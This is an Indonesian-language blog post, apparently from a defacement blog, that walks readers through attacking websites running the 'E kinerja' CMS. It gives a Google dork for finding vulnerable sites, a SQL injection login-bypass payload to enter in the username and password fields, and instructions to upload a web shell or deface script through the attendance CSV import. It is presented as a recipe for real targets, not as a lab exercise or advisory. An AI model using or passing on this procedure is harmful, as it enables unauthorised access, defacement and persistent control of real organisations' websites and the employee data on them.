e kinerja Cms vuln Bypas Sql Login

Assalamualaikum wr wb
Deface Web Bypas Sql Login Cms E kinerja
================================
Penjelasan Singkat:pada website cms E kinerja ada bug bypas(bye bye password) Sql Login
================================
Google Dork:"EKinerja (Remunerasi Kinerja)"
              (kembangin dorknya)
================================
Vulnreability:import Csv
================================
Proof of concept:
1.Dorking Di Google dan Pilih web yg vuln
2.Pada halaman login isi dengan
   username: ' or 1=1 limit 1 -- -+
   password: ' or 1=1 limit 1 -- -+

3.Login Dan masuk Dashboard admin
4.Upload Your shell atau script deface di bagian absensi pegawai>>import csv


  note:terkadang setiap web beda beda
tempat up shell nya dan ga semua web vuln
5.panggil shellmu
  (use your brain:v)


  Sekian wassalamualaikum wr wb




Belum ada Komentar untuk "e kinerja Cms vuln Bypas Sql Login"

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel